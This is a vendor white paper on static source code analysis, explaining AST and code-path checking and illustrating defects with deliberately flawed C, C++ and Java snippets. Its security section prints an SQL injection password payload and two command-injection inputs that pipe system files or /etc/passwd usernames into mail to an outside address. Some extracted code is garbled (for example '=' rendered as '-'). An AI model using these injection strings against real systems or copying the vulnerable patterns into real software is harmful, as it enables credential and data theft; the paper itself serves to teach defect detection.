Download pdf - Klocwork Paper Static Analysis When Why How

When,WhyandHow toLeverageSourceCodeAnalysisTools

Finding critical bugs in C, C++ and Java code

Automatedsourcecodeanalysisistechnologyaimedatlocatinganddescribingareasofweaknessinsourcecode.Thoseweaknessesmightbesecurityvulnerabilities,logicerrors,implementationdefects,concurrencyviolations,rareboundaryconditions,ormanyothertypesofproblem-causingcode.Thenameoftheassociatedresearchfieldisstaticanalysis.Thisisdifferentiatedfrommoretraditionaldynamicanalysistechniquessuchasunitorpenetrationtestbythefactthattheworkisperformedatbuildtimeusingonlythesourcecodeoftheprogramormoduleinquestion.Theresultsreportedarethereforegeneratedfromacompleteviewofeverypossibleexecutionpath,ratherthansomeaspectofanecessarilylimitedobservedruntimebehavior.

Perhapsthemostobviousquestionconfrontinganynewdeveloper-facingtechnologyis:why?

»» Whyshoulddevelopersuseanewtoolwhentheyalreadyhavesomanytochoosefrom?

»» Whatmakesthistechnologycompellingenoughtomakemewanttoaddittomyalreadybloatedbuildchain?

»» Andwhatdoesitdo,anyway?

Thispaperwillanswerthesequestions,andmore.Butforthemomentjustconsiderthefactthatattimeofwriting,80%oftheFortune500havealreadydeployed,orarecurrentlyengagedindeploying,somekindofautomatedsourcecodeanalysis.Thereasonsfordoingsocanbestatedinasmanywaysastherearepeopleansweringthequestion,butthebasicprinciplecanbefoundinallofthesedeployments:

»» Tellmewhat’swrongwithmycodebeforeIshipit–don’tletmebetheguyresponsibleforshippingakillervulnerabilityorbugintothewild.

Thereareothercompellingreasons,suchas:

»» Makemyexistingprocessesforcodereviewmoreeffectivethroughautomation

»» EnhancemyexistingQAresourcewith100%coverageofallboundaryconditions

»» Helpmeprotectmybrandaswegotomarketwithnewproducts

Butthebottomlineremainsthecapabilityofthistechnologytoafforddeveloperstheabilitytoscrubtheircodeofobviousandnot-so-obviousweaknessesastheywork,beforetheysubmittheircodeforcheck-inandmoreformaldown-streamvalidationprocedures.

GWYNFISHER,CTOWHITEPAPER | OCTOBER2007

WWW.KLOCWORK.COM

When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 2

IntroductiontotheTechnology____________________________________________________________________________________

Theprocessofautomatedsourcecodeanalysisinvolvesbuildingarichrepresentationormodeloftheprovidedcode(akintoacompilationphase),andthensimulatingallpossibleexecutionpathsthroughthatmodel,mappingouttheflowoflogiconthosepathscoupledwithhowandwheredataobjectsarecreated,usedanddestroyed.

Oncetheprojectionofcodepathsandthemappingofdataobjectsareavailable,wecanlookforanomalousconditionsthateitherwillormightpotentiallycauseexploitablevulnerabilities,executionfailure,ordatacorruptionatruntime.

Therearetwomajorfamiliesofcheckingcapabilitytypicaltothistypeofanalysis:abstractsyntaxtree(AST)validationandcodepathanalysis.Theformercaseismostfrequentlyappliedtovalidationofthebasicsyntaxandstructureofcode,whereasthelatterisusedformorecompletetypesofanalysisthatdependonunderstandingthestateofaprogram’sdataobjectsatanyparticularpointonacodeexecutionpath.

Abstract Syntax TreesAnabstractsyntaxtree,orASTforshort,issimplyatree-structuredrepresentationofthesourcecodeasmightbetypicallygeneratedbythepreliminaryparsingstagesofacompiler.Thistreecontainsarichbreakdownofthestructureofthecodeinanon-ambiguousmanner,allowingforsimplesearchestobeperformedforanomaloussyntax.

Considertheexampleofanorganizationwishingtoenforceasetofcorporatecodingstandards.Statedinthestandardisthebasicrequirementfortheuseofacompoundstatementblockratherthansinglestatementsasthebodyofaloop(e.g.afor-loop).Inthiscase,anASTcheckiswhatwouldbeappropriate:

INCORRECT CORRECT

for( i - 0; i < 10; i++ ) doSomething();

for( i - 0; i < 10; i++ ) {doSomething();}

Inthisexample,the(simplified,forclarity)ASTfortheincorrectcasewouldconceptuallyappearasfollows:

Incontrasttowhich,theASTforthecorrectcasewouldconceptuallyappearasfollows:

Asyoucanimagine,constructingcheckersthatlookforthistypeofstandardsviolationisquitestraightforwardanddependssolelyonthesyntaxofthecodeitselfandnotontheruntimebehavior,orstate,ofthatcode.Essentially,thecheckerwouldbeinstructedtofindallinstancesof“For-loop”nodesthatcontaina“Statement”nodeasanimmediatedescendant,andtoflagthemasviolations.

Similarly,ASTcheckerscaneasilybeconstructedtoenforcestandardsaroundnamingconventions,functioncallrestrictions(e.g.unsafelibrarychecks),etc.Anythingthatcanbeinferredfromthecodewithoutrequiringknowledgeofthatcode’sruntimebehavioristypicallyatargetforASTchecking.

For-loop Statement doSomething()

For-loop Statement block Statement doSomething()


GiventhesimplenatureofwhatASTcheckerscanactuallydo,therearemanytoolsthatofferthistypeofcheckingforvariousdifferentlanguages,someofwhicharefreelyavailablefromtheopensourcecommunity,forexamplePMDforJava.SeveralofthesetoolsuseXPath,oranXPath-derivedgrammartodefinetheconditionsthatthecheckerslookfor,andcustomersshouldconsideradoptingsolutionsthatprovideextensibilitymechanismsforcreatingASTcheckers.Thistypeofcheckingisrelativelysimpletodo,andconstructingnewcheckersofthistypeforcorporatecodingstandardsorindustryrecommendedbestpracticeisacommonendeavor.

Code Path AnalysisConsidernowamorecomplexexample.Thistimeinsteadoflookingforstyleviolations,wewishtocheckwhetheranattempteddereferenceofapointershouldbeexpectedtosucceedorfail:

Inthiscaseitisobviousfrommanualinspectionthatthevariable“ptr”canassumeaNULLvaluewheneverthevariable“x”isodd,andthatthisconditionwillcauseanunavoidablezero-pagedereference.

AttemptingtofindabugofthistypeusingASTscanning,however,isseriouslynon-trivial.Considerthe(simplified,forclarity)ASTthatwouldbecreatedfromthatsnippetofcode:

Inthiscase,thereisnoobvioustreesearchorsimplenodeenumerationthatcouldcovertheattempted,andatleastoccasionallyillegal,dereferencingof“ptr”inanythinglikeareasonablygeneralizedform.Soforcasessuchasthis,itisnecessarytotakeastepbeyondsimplysearchingforpatternsofsyntax,andtoanalyzethelifecycleofdataobjectsastheyappearandareusedwithinacontrolpath’sflowofexecution.

Codepathanalysistracksobjectswithinacodeexecutionpathandallowscheckerstovalidatethelegalityorcleanlinessofthedataasitgetsused.Intheexampleabove,theASTthatisbuiltforsimpletypesofstyleandsyntaxchecksisrewritteninaformthatallowsananswertobegeneratedforthefollowingquestion:

»» Isthereavalid,reachablecodepathonwhichtheassignmentofNULLisfollowedbyanattempteddereferencewithoutanintermediatecheck?

if( x & 1) ptr - NULL;*ptr - 1,;

Statement Block If-statement Check-Expression Binary-operator & x 1 True-Branch Expression-statement Assignment-operator - ptr 0 Expression-statement Assignment-operator - Dereference-pointer - ptr 1


Considerthefollowingexampleofcontrolflowanddataobjectusage:

Inthisinstancewewillunavoidablycrashwheneverboth‘x’and‘y’areodd.Findingthissituationrequiresarichrepresentationthatreflectsthestart,ortrigger,ofagivencodepath,anypropagationoraliasingthatoccursduringtheexecutionofthatcodepath,andtheend,orsink,ofthecodepath.

Inourexample,thetriggerforthecodepaththatinterestsusistheassignmentofaNULLvaluetoapointer:

Oncethisassignmentismade,wecanreasonablybeginlookingalongtheensuingreachablecodepathstocheckforpropagationand/orillegalsinkconditions.Inourexample,thefirstpotentialsinkoccursusingthevariable‘p’:

Asthevalueofthepointerischeckedforlegality,however,thisisn’tanillegalsinkconditionandsocanbeignored.Next,wehavepropagation:

Fromthispointforwardsinthereachablecodepathset,referencesto‘q’areasvalidasreferencesto‘p’,astheyarenowaliasesofeachother(untilotherwiseassigned).Knowingthis,thesystemcanagainvalidateapotentialsink:

Inthiscase,itisentirelypossibletofollowalegalcodepathallthewayfromtheassignmentofNULLthroughtotheuseofthatNULLinacrash-causingcontext,andsoapathanalysisdefectwillbereported.

Obviouslythisisonlyonetypeofthemanydifferentquestionsthatcanbeansweredusingthistypeofanalysis,suchas:

»» Isthisnewlycreatedobjectreleasedbeforeallaliasestoitareremovedfromscope?

»» Isthisdataobjecteverrange-checkedbeforebeingpassedtoanOSfunction?»» Isthisstringevercheckedforspecialcharactersbeforebeingsubmitted

asaSQLquery?»» Willthiscopyoperationresultinabufferoverflow?»» Isitsafetocallthisfunctionatthistime?

Byfollowingcodeexecutionpaths,eitherforwardfromatriggereventtowardsatargetscenario,orbackwardsfromatriggereventtowardsarequiredinitialization,wecandeterminetheanswerstothesequestionsandprovideerrorreportswhenthetargetscenarioorinitializationeitherdoesordoesnotoccurasexpected.

Thistypeofcapabilityisrequiredtodosophisticatedanalysisofsourcecodeandcustomersshouldlookfortoolsthatprovidecomprehensivecodepathanalysistoenablethelocationofflawssuchasmemoryleaks,invalidpointerdereferences,unsafeortainteddatapropagation,concurrencyviolations,andmanyothertypesofproblem-causingconditionsasdescribedinthenextsection.

void f(int x, int y) { int value, *p, *q; p = (x & 1) ? NULL : &value; if( p ) *p = 1; q = p; if( y & 1 ) *q = 1;}

p = (x & 1) ? NULL : &value;

if( p ) *p = 1;

q = p;

if( y & 1 ) *q = 1;


WhatTypeofIssuesCanBeFound?__________________________________________________________________________

Inthissection,wewillwalkthroughanumberofexamplesofproblemsthatcanbeidentifiedusingmodernstaticanalysistools,showinghowtheyoccurandwhatcanhappeniftheyarenotremediedbeforeshipment.WhilstmanymoretypesofweaknesscanbefoundusingKlocwork’stools,theseexamplesshouldgivethereaderafirmgroundinginwhatagoodstaticanalysissuitecando,regardlessofthevendor.

NotethattheexamplesgivenhereareshowninavarietyofC/C++andJava.Whereappropriate,therelevantcapabilitieswithintheproductareavailableinallsupportedlanguages,however.

Security vulnerabilitiesTraditionallyofinteresttodevelopersworkingonconsumer-facingapplications,securityisbecomingmoreandmorecriticaltodevelopersinalltypesofenvironments,eventhosethathaveuntilrecentlyconsideredsecuritytobeanon-issue.Someofthemoreimportantareasofsecuritythatcanbefoundwithsourcecodeanalysisare:

»» Denialofservice»» SQLinjection»» Bufferoverflow»» Cross-sitescripting(XSS)»» Process/fileinjection

Denial of serviceAscouldbeguessedfromthename,thistypeofvulnerabilityreflectsadesireonthepartofanattackertodenyaccesstoaserviceofferedbyoneormoreprocessesunderattack.Thiscanbecausedmanydifferentways,fromactuallycrashingtheprocess,tochokingtheservicewithaninordinatenumberofrequests,toresourceconstrainingtheservicetothepointofitbecominguseless,etc.Attackvectorsthatareexposedtosuchapproachescanoftenbespottedincodethatisnotcreatedtobedefensive,butrathermakesnaïveassumptionsabouttheoperatingenvironmentwithinwhichitwillberunning.

Considerthefollowingexample:

ThissimplefunctioncaneasilycausearesourceconstraintwithinaserverthatwilleventuallyleadtoaDoScondition.Everytimethisfunctioniscalledanewinstanceofthenamedpropertiescollectionwillbecreatedandwillnotbeclosed.Callthisfunctionwithinthemainrequesthandlerofaserviceanditwon’ttakelongfortheservicetocrawltoahalt.

Likewise,creatingresourcesusingdatathathasnotbeenvalidated(apracticeknownastaintpropagation)canquicklychokeaservice:

public void f(String name, Properties props) throws IOException{ InputStream is; is = getClass().getClassLoader().getResourceAsStream(name); if( is != null ) { props.load(is); }}

public void doGet(HttpServletRequest req,HttpServletResponse res){ String val = req.getParameter(“size”); Map props = new HashMap(Integer.parseInt(val)); …}


Herethetainteddata,asretrievedfromanincomingHTTPparameter,ispassedwithoutvalidationintotheconstructorforaCollectionobject,anoperationthatcaneasilybeattackedtocausetheservicetoshutdown.

NotethatwhilethisexampleusesaJavawebservletrequestfordemonstrationpurposes,manyDoSattackvectorsexistwithinprocessboundaryconditionsthatarenormallyentirelywithinthecontrolofthedeveloperwritingtheapplication.Thistendstoleadtoassumptionsbeingmadeaboutthedatathatwillbemarshaledacrossthatboundary,allowinganattackertodisruptservicesimplybyplacingunexpectedrangesofdataonwhatissupposedtobeacleanwire,asshowninthisexample:

Withoutcheckingthevalueofthe‘bytes’variable,thereisnowaytoguaranteethatthesubsequentallocationwon’tcauseafailure,orpotentiallyworseasignificantconstraintonavailablememoryforotherpartsoftheprocess,tooccur.

SQL InjectionSQL-basedattacksfocusonsloppily-constructedqueriesthatcanresultintheattackerbeingabletocompletelycompromisetheunderlyingdatabasesecuritymodel.Considerthefollowingexampleofaloginvalidationquery:

Incomingparametersfromtheuseraresubstitutedintotheexpressionandthequeryisexecuted.Considerasetofparametersprovidedbyanattacker:

Thatbizarre-lookingpassword,ifnotappropriatelyfilteredbytheapplication,resultsintheloginvalidationqueryperformingaretrievalofeveryIDinthesystem:

Ifthisiscompoundedbytheloginsimplycheckingforsuccessorfailureofthisstatement(asopposedtocountingresultrows),theattackerisquicklygrantedwhateveraccessrightsmightbeavailablefromwhateveruserrecordsareprocessedbytheapplication.Inapplicationswherethefirstrowoftheusertableisreservedforthesuper-user,theapplicationcouldeasilybecompletelycompromised.

Therearemanyotherformsofattackpossibleusingapplicationsthatarenotcarefulintheirtreatmentofsubstitutionstringswithindatabasestatements.Luckily,alargepercentageofthemistakesmostcommonlymadeinpreparingsuchstatementscanbefoundbycheckingstringsthatarebeingprovidedtodatabasefunctionsfortaint,orthelackthereof.

void readDataFromWire(unsigned char* stream){ int bytes = (int)(*stream++); unsigned char* buffer = (unsigned char*)malloc(bytes); …}

SELECT ID FROM USERS WHERE NAME=’user’ AND PWD=’password’;

NAME: xPWD: x’ OR ‘1’ = ‘1

SELECT ID FROM USERS WHERE NAME=’x’ AND PWD=’x’ OR ‘1’ = ‘1’;

public void query(HttpServletRequest req, Connection conn) throws Exception{ Statement stmt = conn.createStatement(); String val = req.getParameter(“User”); stmt.executeQuery(“select * from users where user=’” + val + “’;”);}


Inthisexample,thetaintedinputvalue“val”wasretrievedfromtheincomingrequestandsubstitutedintoadatabasestatementwithoutfirsthavingbeenscrubbedforcharactersoutsideofthealphanumericrange.Anysuchusageissubjecttoattack,andwillcausewarningstobegeneratedbythetool.

Buffer overflowBuffersorarraysthatareimproperlyhandledcanpotentiallyleadtoprocesscorruptionandeventheexecutionofarbitrarycodeinjectedbyanattacker.Considerthefollowingexample:

Inthistrivialcase,theauthorhasmadeafundamentalassumptionaboutthecleanlinessoftheincomingdata,coupledwithanarchitecturalassumptionabouttherangeofthatdata.Ifthisfunctionisusedinanenvironmentopentoattack,forexampletoprocessmarshaleddatafromanotherprocessorserver,orevenfromafilethatissubjecttoinjectionontheuser’ssystem,theattackercouldcauseconsiderablestackcorruptionsimplybyexploitingthefactthatthecodewillhappilycopyupto255bytesintoabufferabletoholdonly32.Aparticularlyaccomplishedattackercouldusethisexploittoinjectcarefullycraftedcodethateffectivelyhijackstheprocessbyinsertingdummystackcontentandoverwritingoneormorecallframes.

Arecent,highprofilesecuritybreachinMicrosoftWindowswascausedbyexactlythisscenario.The“animatedcursorvulnerability”asitwasknownwascausedbyasectionofcodethateffectivelyperformedthefollowingoperations:

Givensufficienttime,motivationandresource,attackerswereabletocompletelycompromisetargetsystemssimplybyencouraginguserstoloadandusecarefullycraftedanimatedcursorfiles.Thosecursorfilescontainedstructuresguaranteedtocausethisoperationtooverflowavailablespace,tothereforecorruptthestack,andtoplaceontheresultingstackaframeintendedtotransfercontroltofunctionsopentocompromise.

Cross-site scripting (XSS)OneofthefirstrestrictionsplacedonJavaScriptinearlybrowserversionswastobuildawallaroundpagecontentsothatscriptsexecutingwithinaframeservedbyonesitecouldnotaccesscontentofframesservedbyanothersite.Cross-sitescripting,therefore,isanattackpatternthatfocusesonenablingscriptfromonesite(theattacker’ssite)toaccesscontentfromanothersite(e.g.theuser’sbankaccountsite).Inordertodothis,theusermusttypicallyvisiteitheramaliciousoranaïvewebsite,obviously,althoughmanyexperimentsinsocialengineeringhaveshownthatuserscanbefunneledtowardseventhemostoutlandishofsitesquitereadily.

Intermsofphysicalmanifestation,themostcommonformofXSSrequiresunfilteredHTMLtobereflectedbacktotheuserfromaserverrequest.Onecommonearlyattackvectorwassearchengineresultpages,whichtypically

void f(unsigned char* stream){ unsigned char buf[32]; memcpy(buf, stream + 1, *stream); …}

HICON LoadAniIcon(…){ … ANIHEADER myAniHeader; memcpy(&myAniHeader, untrustedData->data, untrustedData->length); …}


reflectedtheuser’squeryterminthetitleofthepage.Withoutfiltering,thisreflectedquerytermcouldeasilycontainHTMLtagsthatwerenotcorrectlyencodedandwillthereforebeinterpretedasvalidHTMLbythereceivingbrowser.

Inessence,anyreflectionofunfilteredincomingdatawilltriggerawarningfromthetool,asthenumberandvarietyofexploitsresultingfromXSSgrowseveryday.Forexample:

OthermanifestationsofXSSrevolvearoundthepersistentstorageofunfiltereduserinputthatislaterusedtoprovideresponsecontent.ThisisamoredifficulttypeofXSStodiagnose,astheattackpatterndependsnotonlyonauser’sunfilteredinputbeingstored,butonthatstoredtainteddatabeingmadeavailabletoeveryuserfromthatpointonwards.Naïveforumsoftwarepackageswereparticularlysusceptibletothisattackpatternintheearlydaysoftheweb,butinessenceanyapplicationthatstoresincomingunfilteredwebdatainadatabase(orfile)andthenreflectsthatstoreddatabacktotheuseratalaterdateisvulnerabletothispersistentformofXSS.Duetothisattackpatternbeingsodestructiveifexploited,thetooltriggersawarningwheneverunfiltereddataisretrievedfrompersistentstorageandforwardedtotheuser.

Process or file injectionOfparticularvaluetoattackers,andthereforeparticularlytobeavoidedbyauthors,areattackvectorsthatallowthemodificationofsystemcommandsand/orsystemfiles.Performingprocesscreationusingtaintedinput,orcreatingfilesusingtaintednamesorlocationsarethemostprevalentmistakesmade.

Considerthefollowing:

Inthisexampletheauthorhasleftthemselvesopentomaliciousattackbynotscrubbingtheincomingfilenamebeforeappendingittoaninnocuous-lookingcommand.Considerinputthatgetsappendedbythisfunctionwithoutfurtherprocessingtothe“ls”commandsuchas:

or

Ingeneral,anyexitpointtotheunderlyingOSthatuseseitheracommandorfilenamemustbevalidatedforspecialcharacterspriortothecallbeingplaced.Failuretodosomaywellresultincatastrophicresultsfortheoperatingenvironment.

public void doGet(HttpServletRequest req, HttpServletResponse res){ String title = req.getParameter(“searchTerm”); res.getOutputStream().write(title.getBytes(“UTF-8”));}

void doListing(char* name){ char command[256]; if( strlen(name) < 250 ) { sprintf(command, “ls %s”, name); system(command); }}

-R / | grep secret | mail [email protected]

/dev/null | cat /etc/passwd | awk –F: ‘{print $1}’ | mail [email protected]


Anotherexampleshowsafile-specificattackvector:

Inthisexample,apotentiallytaintedstringisusedtoconstructarelativepathname.Unfortunatelyfortheauthor,theFileconstructorusedhereplacesnorestrictionontheuseof“../”beingapathelement,thusleavingthisapplicationwideopentoarbitraryfilecreationand/oroverwrite.

Implementation defectsRegardlessoftheapplicationbeingdeveloped,implementationdefectsthatescapeintothewildhavesignificantimpactontheproductbeingdeployed.Thiscouldrangefromincreasedsupportcoststoongoingbrandcriticismtobottomlineimpactfrominventoryreversal.Releasingaqualityproductiseverybody’sgoal,andstaticanalysistoolscanhelpsignificantlyinbringingthatproducttomarket.Someofthemoreimportantareasofqualityandongoingmaintenanceare:

»» Memorymanagement;leaks,usingreleasedmemory,etc.»» NULLpointerdereference/exception»» Arrayboundsviolations»» Concurrencyflawsanddeadlocks

Memory management mistakesMemoryallocationandthecorrectreleasingofthatmemoryisamajorsourceofdefects,particularlyinCandC++code.Staticanalysisiswellappliedinthisarea,duetocomprehensivecoverageofcodepathsthatcanresultinrareboundaryconditionsbeingsignaledthatmightneverbefoundusingtraditionalruntimeprofilingtools.

Comprehensivestaticanalysistoolsshouldbeabletotrackallocationsandaliasesofallocatedmemorytoensurethatallallocationsarereleased,thatcodepathsdonotattempttomakeuseofreleasedmemory,andthatmemoryobjectsarenotreleasedtwice.

public void doPost(HttpServletRequest req, HttpServletResponse resp){ String loc = req.getParameter(“name”); unpackFilesTo(loc, req.getInputStream());}private void unpackFilesTo(String loc, InputStream data){ File dir = new File(“./unpacked/”, loc); …}

void f(…){ char* p = (char*)malloc(32); char* q = p; /* Use of unchecked allocation, might well be NULL */ strcpy(p, “hello world”); /* Release the memory by freeing an alias */ free(q); /* Attempted use of already released memory */ strcpy(p, “not good”); free(p);}


NULL pointer dereferenceDefectsinvolvingNULLpointersareasoldasprogrammingitself,andstillasprevalenttodayasinanytimebefore.WeallunderstandwhatNULLpointerscando,andweallspendtimelookingforthemanddealingwiththeafter-effectsoftheirbeingfoundinthewild.Butconsiderthefollowingexamplecodingpatternthatisfairlyprevalentinevenwell-knownandmoderncodebases:

OrperhapsaJavaexample–justbecausetherearen’tpointersinthelanguagedoesn’tmeanyoucan’tdereferenceaNULLobjectreference:

FunctionsthatreturnNULLunderaberrantconditions,andwhosereturnedvaluesarelaterde-referenced,areparticularlydifficulttodiagnose.Ifthestaticanalyzerisabletoconsidereverypotentialcodepath,howeverunlikely,eventheserareboundaryconditionsarefoundandreported.

Array bounds violationsAccessingarraysoutofboundsisanincrediblycommonmistake,evenbyseniordevelopers.ConsiderthefollowingexamplefromcodewrittenbyavendorinsupportoftheirdeviceunderLinux(detailsobscured):

Inmanyinstances,perhapsthemajorityofthetime,thiscodewillrunwithouthiccup.Buteventuallyitisguaranteedtocauseabusfaultorpageviolationbasedontheindexcheckbeingperformedafterthatindexisusedtoaccessthe‘dev’array.

Concurrency violationsWiththetrendtowardsmoreandmoremulti-coredesignsatthechiplevel,developersareincreasinglybeingcalledupontocreatethreaded,oratleastthread-aware,software.ThisplacesadditionalburdenintermsofunderstandinghowcertainOScallsinteractwithlocksthatcancausethreadstohang,andpotentiallytodeadlocktwoormorethreadsinaprocess.

Onlyahandfuloftools,suchastheonesprovidedbyKlocwork,areabletoapplyvalidationsintheareaofconcurrency,suchasensuringthatthreadsholdinglocksdonotattempttosuspendorhaltthemselves,thatlocksarecorrectlyreleased,andthatlockholdersdonotattemptreal-timepausingactivities.

void f(char* ptr){ if( *ptr && ptr ) …}

public void f(String str){ if( str.length() == 0 || str == null ) return; …}

int f(){ struct devinfo* dev[8]; int i; get_device_info(dev, 8); for( i = 0; dev[i] && (i < 8); i++ ) { … }}


Forexample:

Inthispathologicalexample,allthreadsrequiringaccesstothe“lock”mutexwouldbedeadlockedfor30swaitingforthissegmenttounlock.

Worseyet,thefollowingexampleshowsanever-releasedlock:

Inthecasewherethefunction“op”returnszero,thecallingthreadwillmaintainthemutexonreturn.Assumingthislockisbeingusedfortaskschedulingorothertypicalserveractivities,theobviousresultisahungsystem.

Anotheraspectofconcurrencyisconcurrentmodificationofdataobjects.ThefollowingexampleshowsaJavaCollectionoperationthatwillbeflaggedasillegal:

Infact,thisoperationisillegaleveninasinglethreadedenvironmentasitviolatesabasiccontractwithintheCollectionsframework,butinamulti-threadedenvironmentthelikelihoodofthiscausingadatacorruptingproblemwithintheCollectionitselfisvastlyincreased.

Summary__________________________________________________________________________________________________________________

Asadeveloperconsideringusingautomatedsourcecodeanalysis,oradevelopmentmanagerconsideringprovidingsuchanalysistoolsforagroupofcoders,itshouldbeobviousfromtheprevioussectionsofthisdocumentwhatkindofproblemscanbefoundandhowthismightapplyinday-to-daysituations.Inadditiontowhatisdescribedhere,moretypesofproblemscanbefoundbyKlocwork’stools,rangingfromadditionaltypesofsecurityorqualitydefects,tolocatingdeadcode,toincompleteorredundantheaderinclusion,toarchitecturalcoherence,tometricsviolations,andmanyothers.

Oneofthekeyaspectsofanydevelopmenttoolishowitworksforthedeveloper,andbyprovidingIDEintegrationwiththemostcommonlyusedenvironments(VisualStudio,Eclipse,IDEA,WindRiverWorkbench,QNXMomentics,etc.)as

pthread_mutex_t lock;void f(){ pthread_mutex_lock(&lock); sleep(30000); pthread_mutex_unlock(&lock);}

void f(){ pthread_mutex_lock(&lock); switch( op() ) { case 0: return; default: break; } pthread_mutex_unlock(&lock);}

public void f(Collection coll){ for( Iterator it = coll.iterator(); iter.hasNext(); ) { String el = (String)it.next(); if( el.startsWith(“/”) ) coll.remove(el); }}

wellasrobustcommandlinetoolsformoretraditionaldevelopmentenvironments,Klocworkisallaboutsupportingdevelopersintheirnativehabitat.

Whowantstobethepersononthehotseatwhenacriticalvulnerabilityisexploitedinthefield,orwhenacodingmistakecausesaninventoryturnaroundandcostsyourcompanyseriousmoney?Avoidthatexposurebyperformingthemostrigorousformofautomatedcodereviewpossibletoday,anddoitonyourdesktopatthesametimeasyoubuildyourcode.

Klocworkyoursourcecodeandfeelconfidentthatyou’recheckinginthemostsecureanddefect-freecodeyou’veevercreated.

AbouttheAuthor_______________________________________________________________________________________________________

GwynFisheristheCTOofKlocworkandisresponsibleforguidingthecompany’stechnicaldirectionandstrategy.Withnearly20yearsofglobaltechnologyexperience,Gwynbringsavaluablecombinationofvision,experience,anddirectinsightintothedeveloperperspective.Withabackgroundinformalgrammarsandcomputationallinguistics,Gwynhasspentmuchofhiscareerworkinginthesearchandnaturallanguagedomains,holdingseniorexecutivepositionswithcompanieslikeHummingbird,FulcrumTechnologies,PCDOCSandLumaPath.AtKlocwork,Gwynhasreturnedtohisoriginalpassion,compilertheory,andisleveraginghisexperienceandknowledgeofthedevelopermindsettomovethepracticaldomainofstaticanalysistothenextlevel.

AboutKlocwork_________________________________________________________________________________________________________

Klocwork®offersaportfolioofsoftwaredevelopmentproductivitytoolsdesignedtoensurethesecurity,qualityandmaintainabilityofcomplexcodebases.Usingprovenstaticanalysistechnology,Klocwork’stoolsidentifycriticalsecurityvulnerabilitiesandqualitydefects,optimizepeercodereview,andhelpdeveloperscreatemoremaintainablecode.Klocwork’stoolsareanintegralpartofthedevelopmentprocessforover850customersintheconsumerelectronics,mobiledevices,medicaltechnologies,telecom,militaryandaerospacesectors.

IN THE UNITED STATES:15 New England Executive ParkBurlington, MA 01803

IN CANADA:30 Edgewater Street, Suite 114Ottawa, ON K2L 1V8

t: 1.866.556.2967f: 613.836.9088www.klOCwORk.COm

© Copyright Klocwork Inc. 2010 · All Rights Reserved